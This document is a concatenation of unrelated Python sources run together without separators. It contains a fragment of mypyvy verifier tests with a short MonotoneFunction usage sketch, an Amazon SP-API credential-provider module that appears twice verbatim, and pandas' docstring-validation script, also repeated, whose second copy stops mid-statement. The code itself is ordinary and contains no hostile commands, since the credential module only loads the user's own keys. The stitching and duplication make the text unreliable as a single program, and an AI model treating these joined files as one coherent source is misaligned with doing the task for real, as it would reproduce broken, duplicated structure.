quorum: active_quorum} e = parser.parse_expr('forall Q1, Q2. exists N. member(N, Q1) & member(N, Q2)') e.resolve(prog.scope, None) expected = parser.parse_expr('forall Q1, Q2. active_quorum(Q1) & active_quorum(Q2) -> exists N. 
active_node(N) & (member(N, Q1) & member(N, Q2))') expected.resolve(prog.scope, None) self.assertEqual(syntax.relativize_quantifiers(guards, e), expected) def build_python_cmd() -> List[str]: python = os.getenv('PYTHON') or 'python3.7' return [python, str((PROJECT_ROOT / 'src' / 'mypyvy.py').resolve())] class RegressionTests(unittest.TestCase): def test_regressions(self) -> None: for p in sorted(Path(PROJECT_ROOT / 'examples' / 'regression').glob('*.pyv')): with self.subTest(testFile=str(p)): with open(p) as f: line = f.readline() magic_prefix = '# MYPYVY: ' assert line.startswith(magic_prefix) line = line[len(magic_prefix):] python = os.getenv('PYTHON') or 'python3.7' out_path = p.with_suffix('.output') expect_path = p.with_suffix('.expect') python_cmd = build_python_cmd() + shlex.split(line) + [str(p)] with open(out_path, 'w') as f_out: subprocess.run(python_cmd, stdout=f_out) diff_cmd = ['diff', '-uw', str(expect_path), str(out_path)] proc = subprocess.run(diff_cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.assertEqual(proc.returncode, 0, msg=f'{p} generated output {out_path} which differs from expected output {expect_path}.\n{" ".join(python_cmd)}\n{" ".join(diff_cmd)}') class MonotoneFunctionTests(unittest.TestCase): def setUp(self) -> None: utils.args = mypyvy.parse_args(['typecheck', 'MOCK_FILENAME.pyv']) def test_mononte_function(self) -> None: from pd import MonotoneFunction elems: List[str] = [] mf = MonotoneFunction([(elems,'+')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[0,] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[frozenset(),]) with self.assertRaises(Exception): mf[frozenset([0]),] with self.assertRaises(Exception): mf[frozenset([0,1]),] self.assertEqual( mf.seed([None]), (frozenset(),) ) mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = True self.assertEqual( mf[frozenset(),], False ) self.assertIsNone(mf.seed([None])) elems.append('hello') self.assertEqual( mf.seed([None]), (frozenset([0]),) ) self.assertIsNone(mf.seed([{0: False}])) self.assertIsNone(mf[frozenset([0]),]) with self.assertRaises(Exception): mf[frozenset([0,1]),] mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = True self.assertEqual( mf[frozenset([0]),], False ) self.assertIsNone(mf.seed([None])) elems.append('world') self.assertIsNotNone(mf.seed([None])) self.assertIsNone(mf.seed([{1: False}])) mf[frozenset([1]),] = False self.assertEqual( mf.seed([None]), (frozenset([0,1]),) ) mf[frozenset([0,1]),] = True self.assertEqual( mf[frozenset([0,1]),], True ) self.assertIsNone(mf.seed([None])) elems.append('!') self.assertEqual( mf[frozenset([0,1,2]),], True ) self.assertIsNone(mf[frozenset([0,2]),]) self.assertIsNone(mf[frozenset([2]),]) self.assertEqual(mf.to_elems((frozenset(),)), ([],)) self.assertEqual(mf.to_elems((frozenset([0]),)), (['hello'],)) self.assertEqual(mf.to_elems((frozenset([0,1]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([1,0]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([0,2]),)), (['hello', '!'],)) with self.assertRaises(Exception): mf.to_elems((frozenset([3]),)) mf = MonotoneFunction([(None, '+')]) 
with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[frozenset(),] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[0,]) with self.assertRaises(Exception): mf[-1,] self.assertIsNone(mf.seed([(0,0)])) self.assertIsNone(mf.seed([(None,0)])) self.assertIsNotNone(mf.seed([(None,None)])) self.assertIsNotNone(mf.seed([(100,None)])) v = mf.seed([(100,200)]) self.assertIsNotNone(v) assert v is not None k = v[0] self.assertIsInstance(k, int) self.assertLessEqual(100, k) self.assertLess(k, 200) self.assertIsNone(mf.seed([(5,5)])) self.assertEqual(mf.seed([(5,6)]), (5,)) mf[5,] = False self.assertIsNone(mf.seed([(None,6)])) mf[50,] = True self.assertIsNone(mf.seed([(50,None)])) self.assertEqual(mf.seed([(None,7)]), (6,)) self.assertEqual(mf.seed([(49,None)]), (49,)) with self.assertRaises(Exception): mf[None,] = True with self.assertRaises(Exception): mf[None,] = False elems = [] mf = MonotoneFunction([(elems,'-')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[0,] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[frozenset(),]) with self.assertRaises(Exception): mf[frozenset([0]),] with self.assertRaises(Exception): mf[frozenset([0,1]),] self.assertEqual( mf.seed([None]), (frozenset(),) ) mf[frozenset(),] = True with self.assertRaises(Exception): mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = True self.assertEqual( mf[frozenset(),], True ) self.assertIsNone(mf.seed([None])) elems.append('hello') self.assertEqual( mf.seed([None]), (frozenset([0]),) ) self.assertIsNone(mf.seed([{0: False}])) self.assertIsNone(mf[frozenset([0]),]) with self.assertRaises(Exception): mf[frozenset([0,1]),] mf[frozenset([0]),] = True with self.assertRaises(Exception): mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = True self.assertEqual( mf[frozenset([0]),], True ) self.assertIsNone(mf.seed([None])) elems.append('world') self.assertIsNotNone(mf.seed([None])) self.assertIsNone(mf.seed([{1: False}])) mf[frozenset([1]),] = True self.assertEqual( mf.seed([None]), (frozenset([0,1]),) ) mf[frozenset([0,1]),] = False self.assertEqual( mf[frozenset([0,1]),], False ) self.assertIsNone(mf.seed([None])) elems.append('!') self.assertEqual( mf[frozenset([0,1,2]),], False ) self.assertIsNone(mf[frozenset([0,2]),]) self.assertIsNone(mf[frozenset([2]),]) self.assertEqual(mf.to_elems((frozenset(),)), ([],)) self.assertEqual(mf.to_elems((frozenset([0]),)), (['hello'],)) self.assertEqual(mf.to_elems((frozenset([0,1]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([1,0]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([0,2]),)), (['hello', '!'],)) with self.assertRaises(Exception): mf.to_elems((frozenset([3]),)) # TODO: test multiple domains together, more tests with infinity
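A short sketch of the MonotoneFunction protocol the tests above exercise, assuming mypyvy's pd module is importable; the element names are placeholders. A point over a finite domain is a tuple holding a frozenset of element indices, values start out unknown (None), and setting a point propagates along the monotonicity direction.

from pd import MonotoneFunction

elems = ['a', 'b']
mf = MonotoneFunction([(elems, '+')])   # one finite domain, monotone increasing
point = (frozenset([0]),)               # the subset {'a'}, given as element indices
assert mf[point] is None                # unknown until explicitly set
mf[point] = True                        # '+' monotonicity forces supersets to True
assert mf[(frozenset([0, 1]),)] is True
print(mf.seed([None]))                  # a point whose value is still unknown, or None
print(mf.to_elems(point))               # (['a'],)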
import json import os import confuse import boto3 from botocore.exceptions import ClientError from cachetools import Cache required_credentials = [ 'aws_access_key', 'aws_secret_key', 'lwa_app_id', 'lwa_client_secret' ] class MissingCredentials(Exception): """ Credentials are missing, see the error output to find possible causes """ pass class BaseCredentialProvider: errors = [] credentials = None def __init__(self, account: str = 'default', *args, **kwargs): self.account = account def __call__(self, *args, **kwargs): self.load_credentials() return self.check_credentials() def load_credentials(self): raise NotImplementedError() def check_credentials(self): try: self.errors = [c for c in required_credentials if c not in self.credentials.keys() or not self.credentials[c]] except (AttributeError, TypeError): raise MissingCredentials(f'Credentials are missing: {", ".join(required_credentials)}') if not len(self.errors): return self.credentials raise MissingCredentials(f'Credentials are missing: {", ".join(self.errors)}') class FromCodeCredentialProvider(BaseCredentialProvider): def load_credentials(self): return None def __init__(self, credentials: dict, *args, **kwargs): super(FromCodeCredentialProvider, self).__init__('default', credentials) self.credentials = credentials class FromConfigFileCredentialProvider(BaseCredentialProvider): def load_credentials(self): try: config = confuse.Configuration('python-sp-api') config_filename = os.path.join(config.config_dir(), 'credentials.yml') config.set_file(config_filename) account_data = config[self.account].get() self.credentials = account_data except (confuse.exceptions.NotFoundError, confuse.exceptions.ConfigReadError): return class FromSecretsCredentialProvider(BaseCredentialProvider): def load_credentials(self): if not os.environ.get('SP_API_AWS_SECRET_ID', None): return try: client = boto3.client('secretsmanager') response = client.get_secret_value( SecretId=os.environ.get('SP_API_AWS_SECRET_ID') ) secret = json.loads(response.get('SecretString')) account_data = dict( refresh_token=secret.get('SP_API_REFRESH_TOKEN'), lwa_app_id=secret.get('LWA_APP_ID'), lwa_client_secret=secret.get('LWA_CLIENT_SECRET'), aws_secret_key=secret.get('SP_API_SECRET_KEY'), aws_access_key=secret.get('SP_API_ACCESS_KEY'), role_arn=secret.get('SP_API_ROLE_ARN') ) except ClientError: return else: self.credentials = account_data class FromEnvironmentVariablesCredentialProvider(BaseCredentialProvider): def load_credentials(self): account_data = dict( refresh_token=self._get_env('SP_API_REFRESH_TOKEN'), lwa_app_id=self._get_env('LWA_APP_ID'), lwa_client_secret=self._get_env('LWA_CLIENT_SECRET'), aws_secret_key=self._get_env('SP_API_SECRET_KEY'), aws_access_key=self._get_env('SP_API_ACCESS_KEY'), role_arn=self._get_env('SP_API_ROLE_ARN') ) self.credentials = account_data def _get_env(self, key): return os.environ.get(f'{key}_{self.account}', os.environ.get(key)) class CredentialProvider: credentials = None cache = Cache(maxsize=10) CREDENTIAL_PROVIDERS = [ FromCodeCredentialProvider, FromEnvironmentVariablesCredentialProvider, FromSecretsCredentialProvider, FromConfigFileCredentialProvider ] def __init__(self, account='default', credentials=None): self.account = account for cp in self.CREDENTIAL_PROVIDERS: try: self.credentials = cp(account=account, credentials=credentials)() break except MissingCredentials: continue if self.credentials: self.credentials = self.Config(**self.credentials) else: raise MissingCredentials(f'Credentials are missing: {", 
".join(required_credentials)}') class Config: def __init__(self, **kwargs): self.refresh_token = kwargs.get('refresh_token') self.lwa_app_id = kwargs.get('lwa_app_id') self.lwa_client_secret = kwargs.get('lwa_client_secret') self.aws_access_key = kwargs.get('aws_access_key') self.aws_secret_key = kwargs.get('aws_secret_key') self.role_arn = kwargs.get('role_arn')
import json import os import confuse import boto3 from botocore.exceptions import ClientError from cachetools import Cache required_credentials = [ 'aws_access_key', 'aws_secret_key', 'lwa_app_id', 'lwa_client_secret' ] class MissingCredentials(Exception): """ Credentials are missing, see the error output to find possible causes """ pass class BaseCredentialProvider: errors = [] credentials = None def __init__(self, account: str = 'default', *args, **kwargs): self.account = account def __call__(self, *args, **kwargs): self.load_credentials() return self.check_credentials() def load_credentials(self): raise NotImplementedError() def check_credentials(self): try: self.errors = [c for c in required_credentials if c not in self.credentials.keys() or not self.credentials[c]] except (AttributeError, TypeError): raise MissingCredentials(f'Credentials are missing: {", ".join(required_credentials)}') if not len(self.errors): return self.credentials raise MissingCredentials(f'Credentials are missing: {", ".join(self.errors)}') class FromCodeCredentialProvider(BaseCredentialProvider): def load_credentials(self): return None def __init__(self, credentials: dict, *args, **kwargs): super(FromCodeCredentialProvider, self).__init__('default', credentials) self.credentials = credentials class FromConfigFileCredentialProvider(BaseCredentialProvider): def load_credentials(self): try: config = confuse.Configuration('python-sp-api') config_filename = os.path.join(config.config_dir(), 'credentials.yml') config.set_file(config_filename) account_data = config[self.account].get() self.credentials = account_data except (confuse.exceptions.NotFoundError, confuse.exceptions.ConfigReadError): return class FromSecretsCredentialProvider(BaseCredentialProvider): def load_credentials(self): if not os.environ.get('SP_API_AWS_SECRET_ID', None): return try: client = boto3.client('secretsmanager') response = client.get_secret_value( SecretId=os.environ.get('SP_API_AWS_SECRET_ID') ) secret = json.loads(response.get('SecretString')) account_data = dict( refresh_token=secret.get('SP_API_REFRESH_TOKEN'), lwa_app_id=secret.get('LWA_APP_ID'), lwa_client_secret=secret.get('LWA_CLIENT_SECRET'), aws_secret_key=secret.get('SP_API_SECRET_KEY'), aws_access_key=secret.get('SP_API_ACCESS_KEY'), role_arn=secret.get('SP_API_ROLE_ARN') ) except ClientError: return else: self.credentials = account_data class FromEnvironmentVariablesCredentialProvider(BaseCredentialProvider): def load_credentials(self): account_data = dict( refresh_token=self._get_env('SP_API_REFRESH_TOKEN'), lwa_app_id=self._get_env('LWA_APP_ID'), lwa_client_secret=self._get_env('LWA_CLIENT_SECRET'), aws_secret_key=self._get_env('SP_API_SECRET_KEY'), aws_access_key=self._get_env('SP_API_ACCESS_KEY'), role_arn=self._get_env('SP_API_ROLE_ARN') ) self.credentials = account_data def _get_env(self, key): return os.environ.get(f'{key}_{self.account}', os.environ.get(key)) class CredentialProvider: credentials = None cache = Cache(maxsize=10) CREDENTIAL_PROVIDERS = [ FromCodeCredentialProvider, FromEnvironmentVariablesCredentialProvider, FromSecretsCredentialProvider, FromConfigFileCredentialProvider ] def __init__(self, account='default', credentials=None): self.account = account for cp in self.CREDENTIAL_PROVIDERS: try: self.credentials = cp(account=account, credentials=credentials)() break except MissingCredentials: continue if self.credentials: self.credentials = self.Config(**self.credentials) else: raise MissingCredentials(f'Credentials are missing: {", 
".join(required_credentials)}') class Config: def __init__(self, **kwargs): self.refresh_token = kwargs.get('refresh_token') self.lwa_app_id = kwargs.get('lwa_app_id') self.lwa_client_secret = kwargs.get('lwa_client_secret') self.aws_access_key = kwargs.get('aws_access_key') self.aws_secret_key = kwargs.get('aws_secret_key') self.role_arn = kwargs.get('role_arn')
#!/usr/bin/env python3 """ Analyze docstrings to detect errors. If no argument is provided, it does a quick check of docstrings and returns a csv with all API functions and results of basic checks. If a function or method is provided in the form "pandas.function", "pandas.module.class.method", etc. a list of all errors in the docstring for the specified function or method. Usage:: $ ./validate_docstrings.py $ ./validate_docstrings.py pandas.DataFrame.head """ import argparse import doctest import glob import importlib import json import os import sys import tempfile from typing import List, Optional import flake8.main.application try: from io import StringIO except ImportError: from cStringIO import StringIO # Template backend makes matplotlib to not plot anything. This is useful # to avoid that plot windows are open from the doctests while running the # script. Setting here before matplotlib is loaded. # We don't warn for the number of open plots, as none is actually being opened os.environ["MPLBACKEND"] = "Template" import matplotlib # noqa: E402 isort:skip matplotlib.rc("figure", max_open_warning=10000) import numpy # noqa: E402 isort:skip BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, os.path.join(BASE_PATH)) import pandas # noqa: E402 isort:skip sys.path.insert(1, os.path.join(BASE_PATH, "doc", "sphinxext")) from numpydoc.validate import validate, Docstring # noqa: E402 isort:skip PRIVATE_CLASSES = ["NDFrame", "IndexOpsMixin"] ERROR_MSGS = { "GL04": "Private classes ({mentioned_private_classes}) should not be " "mentioned in public docstrings", "SA05": "{reference_name} in `See Also` section does not need `pandas` " "prefix, use {right_reference} instead.", "EX02": "Examples do not pass tests:\n{doctest_log}", "EX03": "flake8 error: {error_code} {error_message}{times_happening}", "EX04": "Do not import {imported_library}, as it is imported " "automatically for the examples (numpy as np, pandas as pd)", } def pandas_error(code, **kwargs): """ Copy of the numpydoc error function, since ERROR_MSGS can't be updated with our custom errors yet. """ return (code, ERROR_MSGS[code].format(**kwargs)) def get_api_items(api_doc_fd): """ Yield information about all public API items. Parse api.rst file from the documentation, and extract all the functions, methods, classes, attributes... This should include all pandas public API. Parameters ---------- api_doc_fd : file descriptor A file descriptor of the API documentation page, containing the table of contents with all the public API. Yields ------ name : str The name of the object (e.g. 'pandas.Series.str.upper). func : function The object itself. In most cases this will be a function or method, but it can also be classes, properties, cython objects... section : str The name of the section in the API page where the object item is located. subsection : str The name of the subsection in the API page where the object item is located. """ current_module = "pandas" previous_line = current_section = current_subsection = "" position = None for line in api_doc_fd: line = line.strip() if len(line) == len(previous_line): if set(line) == set("-"): current_section = previous_line continue if set(line) == set("~"): current_subsection = previous_line continue if line.startswith(".. currentmodule::"): current_module = line.replace(".. currentmodule::", "").strip() continue if line == ".. 
autosummary::": position = "autosummary" continue if position == "autosummary": if line == "": position = "items" continue if position == "items": if line == "": position = None continue item = line.strip() func = importlib.import_module(current_module) for part in item.split("."): func = getattr(func, part) yield ( ".".join([current_module, item]), func, current_section, current_subsection, ) previous_line = line class PandasDocstring(Docstring): @property def mentioned_private_classes(self): return [klass for klass in PRIVATE_CLASSES if klass in self.raw_doc] @property def examples_errors(self): flags = doctest.NORMALIZE_WHITESPACE | doctest.IGNORE_EXCEPTION_DETAIL finder = doctest.DocTestFinder() runner = doctest.DocTestRunner(optionflags=flags) context = {"np": numpy, "pd": pandas} error_msgs = "" for test in finder.find(self.raw_doc, self.name, globs=context): f = StringIO() runner.run(test, out=f.write) error_msgs += f.getvalue() return error_msgs @property def examples_source_code(self): lines = doctest.DocTestParser().get_examples(self.raw_doc) return [line.source for line in lines] def validate_pep8(self): if not self.examples: return # F401 is needed to not generate flake8 errors in examples # that do not user numpy or pandas content = "".join( ( "import numpy as np # noqa: F401\n", "import pandas as pd # noqa: F401\n", *self.examples_source_code, ) ) application = flake8.main.application.Application() application.initialize(["--quiet"]) with tempfile.NamedTemporaryFile(mode="w", encoding="utf-8") as file: file.write(content) file.flush() application.run_checks([file.name]) # We need this to avoid flake8 printing the names of the files to # the standard output application.formatter.write = lambda line, source: None application.report() yield from application.guide.stats.statistics_for("") def pandas_validate(func_name: str): """ Call the numpydoc validation, and add the errors specific to pandas. Parameters ---------- func_name : str Name of the object of the docstring to validate. Returns ------- dict Information about the docstring and the errors found. """ doc = PandasDocstring(func_name) result = validate(func_name) mentioned_errs = doc.mentioned_private_classes if mentioned_errs: result["errors"].append( pandas_error("GL04", mentioned_private_classes=", ".join(mentioned_errs)) ) if doc.see_also: for rel_name, rel_desc in doc.see_also.items(): if rel_name.startswith("pandas."): result["errors"].append( pandas_error( "SA05", reference_name=rel_name, right_reference=rel_name[len("pandas.") :], ) ) result["examples_errs"] = "" if doc.examples: result["examples_errs"] = doc.examples_errors if result["examples_errs"]: result["errors"].append( pandas_error("EX02", doctest_log=result["examples_errs"]) ) for err in doc.validate_pep8(): result["errors"].append( pandas_error( "EX03", error_code=err.error_code, error_message=err.message, times_happening=f" ({err.count} times)" if err.count > 1 else "", ) ) examples_source_code = "".join(doc.examples_source_code) for wrong_import in ("numpy", "pandas"): if f"import {wrong_import}" in examples_source_code: result["errors"].append( pandas_error("EX04", imported_library=wrong_import) ) return result def validate_all(prefix, ignore_deprecated=False): """ Execute the validation of all docstrings, and return a dict with the results. Parameters ---------- prefix : str or None If provided, only the docstrings that start with this pattern will be validated. If None, all docstrings will be validated. 
ignore_deprecated: bool, default False If True, deprecated objects are ignored when validating docstrings. Returns ------- dict A dictionary with an item for every function/method... containing all the validation information. """ result = {} seen = {} api_doc_fnames = os.path.join(BASE_PATH, "doc", "source", "reference", "*.rst") api_items = [] for api_doc_fname in glob.glob(api_doc_fnames): with open(api_doc_fname) as f: api_items += list(get_api_items(f)) for func_name, func_obj, section, subsection in api_items: if prefix and not func_name.startswith(prefix): continue doc_info = pandas_validate(func_name) if ignore_deprecated and doc_info["deprecated"]: continue result[func_name] = doc_info shared_code_key = doc_info["file"], doc_info["file_line"] shared_code = seen.get(shared_code_key, "") result[func_name].update( { "in_api": True, "section": section, "subsection": subsection, "shared_code_with": shared_code, } ) seen[shared_code_key] = func_name return result def print_validate_all_results( prefix: str, errors: Optional[List[str]], output_format: str, ignore_deprecated: bool, ): if output_format not in ("default", "json", "actions"): raise ValueError(f'Unknown output_format "{output_format}"') result = validate_all(prefix, ignore_deprecated) if output_format == "json": sys.stdout.write(json.dumps(result)) return 0 prefix = "##[error]" if output_format == "actions" else "" exit_status = 0 for name, res in result.items(): for err_code, err_desc in res["errors"]: if errors and err_code not in errors: continue sys.stdout.write( f'{prefix}{res["file"]}:{res["file_line"]}:' f"{err_code}:{name}:{err_desc}\n" ) exit_status += 1 return exit_status def print_validate_one_results(func_name: str): def header(title, width=80, char="#"): full_line = char * width side_len = (width - len(title) - 2) // 2 adj = "" if len(title) % 2 == 0 else " " title_line = f"{char * side_len} {title}{adj} {char * side_len}" return f"\n{full_line}\n{title_line}\n{full_line}\n\n" result = pandas_validate(func_name) sys.stderr.write(header(f"Docstring ({func_name})")) sys.stderr.write(f"{result['docstring']}\n") sys.stderr.write(header("Validation")) if result["errors"]: sys.stderr.write(f'{len(result["errors"])} Errors found:\n') for err_code, err_desc in result["errors"]: if err_code == "EX02": # Failing examples are printed at the end sys.stderr.write("\tExamples do not pass tests\n") continue sys.stderr.write(f"\t{err_desc}\n") else: sys.stderr.write(f'Docstring for "{func_name}" correct. :)\n') if result["examples_errs"]: sys.stderr.write(header("Doctests")) sys.stderr.write(result["examples_errs"]) def main(func_name, prefix, errors, output_format, ignore_deprecated): """ Main entry point. Call the validation for one or for all docstrings. """ if func_name is None: return print_validate_all_results( prefix, errors, output_format, ignore_deprecated ) else: print_validate_one_results(func_name) return 0 if __name__ == "__main__": format_opts = "default", "json", "actions" func_help = ( "function or method to validate (e.g. pandas.DataFrame.head) " "if not provided, all docstrings are validated and returned " "as JSON" ) argparser = argparse.ArgumentParser(description="validate pandas docstrings") argparser.add_argument("function", nargs="?", default=None, help=func_help) argparser.add_argument( "--format", default="default", choices=format_opts, help="format of the output when validating " "multiple docstrings (ignored when validating one). 
" "It can be {str(format_opts)[1:-1]}", ) argparser.add_argument( "--prefix", default=None, help="pattern for the " "docstring names, in order to decide which ones " 'will be validated. A prefix "pandas.Series.str."' "will make the script validate all the docstrings " "of methods starting by this pattern. It is " "ignored if parameter function is provided", ) argparser.add_argument( "--errors", default=None, help="comma separated " "list of error codes to validate. By default it " "validates all errors (ignored when validating " "a single docstring)", ) argparser.add_argument( "--ignore_deprecated", default=False, action="store_true", help="if this flag is set, " "deprecated objects are ignored when validating " "all docstrings", ) args = argparser.parse_args() sys.exit( main( args.function, args.prefix, args.errors.split(",") if args.errors else None, args.format, args.ignore_deprecated, ) )
#!/usr/bin/env python3 """ Analyze docstrings to detect errors. If no argument is provided, it does a quick check of docstrings and returns a csv with all API functions and results of basic checks. If a function or method is provided in the form "pandas.function", "pandas.module.class.method", etc. a list of all errors in the docstring for the specified function or method. Usage:: $ ./validate_docstrings.py $ ./validate_docstrings.py pandas.DataFrame.head """ import argparse import doctest import glob import importlib import json import os import sys import tempfile from typing import List, Optional import flake8.main.application try: from io import StringIO except ImportError: from cStringIO import StringIO # Template backend makes matplotlib to not plot anything. This is useful # to avoid that plot windows are open from the doctests while running the # script. Setting here before matplotlib is loaded. # We don't warn for the number of open plots, as none is actually being opened os.environ["MPLBACKEND"] = "Template" import matplotlib # noqa: E402 isort:skip matplotlib.rc("figure", max_open_warning=10000) import numpy # noqa: E402 isort:skip BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, os.path.join(BASE_PATH)) import pandas # noqa: E402 isort:skip sys.path.insert(1, os.path.join(BASE_PATH, "doc", "sphinxext")) from numpydoc.validate import validate, Docstring # noqa: E402 isort:skip PRIVATE_CLASSES = ["NDFrame", "IndexOpsMixin"] ERROR_MSGS = { "GL04": "Private classes ({mentioned_private_classes}) should not be " "mentioned in public docstrings", "SA05": "{reference_name} in `See Also` section does not need `pandas` " "prefix, use {right_reference} instead.", "EX02": "Examples do not pass tests:\n{doctest_log}", "EX03": "flake8 error: {error_code} {error_message}{times_happening}", "EX04": "Do not import {imported_library}, as it is imported " "automatically for the examples (numpy as np, pandas as pd)", } def pandas_error(code, **kwargs): """ Copy of the numpydoc error function, since ERROR_MSGS can't be updated with our custom errors yet. """ return (code, ERROR_MSGS[code].format(**kwargs)) def get_api_items(api_doc_fd): """ Yield information about all public API items. Parse api.rst file from the documentation, and extract all the functions, methods, classes, attributes... This should include all pandas public API. Parameters ---------- api_doc_fd : file descriptor A file descriptor of the API documentation page, containing the table of contents with all the public API. Yields ------ name : str The name of the object (e.g. 'pandas.Series.str.upper). func : function The object itself. In most cases this will be a function or method, but it can also be classes, properties, cython objects... section : str The name of the section in the API page where the object item is located. subsection : str The name of the subsection in the API page where the object item is located. """ current_module = "pandas" previous_line = current_section = current_subsection = "" position = None for line in api_doc_fd: line = line.strip() if len(line) == len(previous_line): if set(line) == set("-"): current_section = previous_line continue if set(line) == set("~"): current_subsection = previous_line continue if line.startswith(".. currentmodule::"): current_module = line.replace(".. currentmodule::", "").strip() continue if line == ".. 
autosummary::": position = "autosummary" continue if position == "autosummary": if line == "": position = "items" continue if position == "items": if line == "": position = None continue item = line.strip() func = importlib.import_module(current_module) for part in item.split("."): func = getattr(func, part) yield ( ".".join([current_module, item]), func, current_section, current_subsection, ) previous_line = line class PandasDocstring(Docstring): @property def mentioned_private_classes(self): return [klass for klass in PRIVATE_CLASSES if klass in self.raw_doc] @property def examples_errors(self): flags = doctest.NORMALIZE_WHITESPACE | doctest.IGNORE_EXCEPTION_DETAIL finder = doctest.DocTestFinder() runner = doctest.DocTestRunner(optionflags=flags) context = {"np": numpy, "pd": pandas} error_msgs = "" for test in finder.find(self.raw_doc, self.name, globs=context): f = StringIO() runner.run(test, out=f.write) error_msgs += f.getvalue() return error_msgs @property def examples_source_code(self): lines = doctest.DocTestParser().get_examples(self.raw_doc) return [line.source for line in lines] def validate_pep8(self): if not self.examples: return # F401 is needed to not generate flake8 errors in examples # that do not user numpy or pandas content = "".join( ( "import numpy as np # noqa: F401\n", "import pandas as pd # noqa: F401\n", *self.examples_source_code, ) ) application = flake8.main.application.Application() application.initialize(["--quiet"]) with tempfile.NamedTemporaryFile(mode="w", encoding="utf-8") as file: file.write(content) file.flush() application.run_checks([file.name]) # We need this to avoid flake8 printing the names of the files to # the standard output application.formatter.write = lambda line, source: None application.report() yield from application.guide.stats.statistics_for("") def pandas_validate(func_name: str): """ Call the numpydoc validation, and add the errors specific to pandas. Parameters ---------- func_name : str Name of the object of the docstring to validate. Returns ------- dict Information about the docstring and the errors found. """ doc = PandasDocstring(func_name) result = validate(func_name) mentioned_errs = doc.mentioned_private_classes if mentioned_errs: result["errors"].append( pandas_error("GL04", mentioned_private_classes=", ".join(mentioned_errs)) ) if doc.see_also: for rel_name, rel_desc in doc.see_also.items(): if rel_name.startswith("pandas."): result["errors"].append( pandas_error( "SA05", reference_name=rel_name, right_reference=rel_name[len("pandas.") :], ) ) result["examples_errs"] = "" if doc.examples: result["examples_errs"] = doc.examples_errors if result["examples_errs"]: result["errors"].append( pandas_error("EX02", doctest_log=result["examples_errs"]) ) for err in doc.validate_pep8(): result["errors"].append( pandas_error( "EX03", error_code=err.error_code, error_message=err.message, times_happening=f" ({err.count} times)" if err.count > 1 else "", ) ) examples_source_code = "".join(doc.examples_source_code) for wrong_import in ("numpy", "pandas"): if f"import {wrong_import}" in examples_source_code: result["errors"].append( pandas_error("EX04", imported_library=wrong_import) ) return result def validate_all(prefix, ignore_deprecated=False): """ Execute the validation of all docstrings, and return a dict with the results. Parameters ---------- prefix : str or None If provided, only the docstrings that start with this pattern will be validated. If None, all docstrings will be validated. 
ignore_deprecated: bool, default False If True, deprecated objects are ignored when validating docstrings. Returns ------- dict A dictionary with an item for every function/method... containing all the validation information. """ result = {} seen = {} api_doc_fnames = os.path.join(BASE_PATH, "doc", "source", "reference", "*.rst") api_items = [] for api_doc_fname in glob.glob(api_doc_fnames): with open(api_doc_fname) as f: api_items += list(get_api_items(f)) for func_name, func_obj, section, subsection in api_items: if prefix and not func_name.startswith(prefix): continue doc_info = pandas_validate(func_name) if ignore_deprecated and doc_info["deprecated"]: continue result[func_name] = doc_info shared_code_key = doc_info["file"], doc_info["file_line"] shared_code = seen.get(shared_code_key, "") result[func_name].update( { "in_api": True, "section": section, "subsection": subsection, "shared_code_with": shared_code, } ) seen[shared_code_key] = func_name return result def print_validate_all_results( prefix: str, errors: Optional[List[str]], output_format: str, ignore_deprecated: bool, ): if output_format not in ("default", "json", "actions"): raise ValueError(f'Unknown output_format "{output_format}"') result = validate_all(prefix, ignore_deprecated) if output_format == "json": sys.stdout.write(json.dumps(result)) return 0 prefix = "##[error]" if output_format == "actions" else "" exit_status = 0 for name, res in result.items(): for err_code, err_desc in res["errors"]: if errors and err_code not in errors: continue sys.stdout.write( f'{prefix}{res["file"]}:{res["file_line"]}:' f"{err_code}:{name}:{err_desc}\n" ) exit_status += 1 return exit_status def print_validate_one_results(func_name: str): def header(title, width=80, char="#"): full_line = char * width side_len = (width - len(title) - 2) // 2 adj = "" if len(title) % 2 == 0 else " " title_line = f"{char * side_len} {title}{adj} {char * side_len}" return f"\n{full_line}\n{title_line}\n{full_line}\n\n" result = pandas_validate(func_name) sys.stderr.write(header(f"Docstring ({func_name})")) sys.stderr.write(f"{result['docstring']}\n") sys.stderr.write(header("Validation")) if result["errors"]: sys.stderr.write(f'{len(result["errors"])} Errors found:\n') for err_code, err_desc in result["errors"]: if err_code == "EX02": # Failing examples are printed at the end sys.stderr.write("\tExamples do not pass tests\n") continue sys.stderr.write(f"\t{err_desc}\n") else: sys.stderr.write(f'Docstring for "{func_name}" correct. :)\n') if result["examples_errs"]: sys.stderr.write(header("Doctests")) sys.stderr.write(result["examples_errs"]) def main(func_name, prefix, errors, output_format, ignore_deprecated): """ Main entry point. Call the validation for one or for all docstrings. """ if func_name is None: return print_validate_all_results( prefix, errors, output_format, ignore_deprecated ) else: print_validate_one_results(func_name) return 0 if __name__ == "__main__": format_opts = "default", 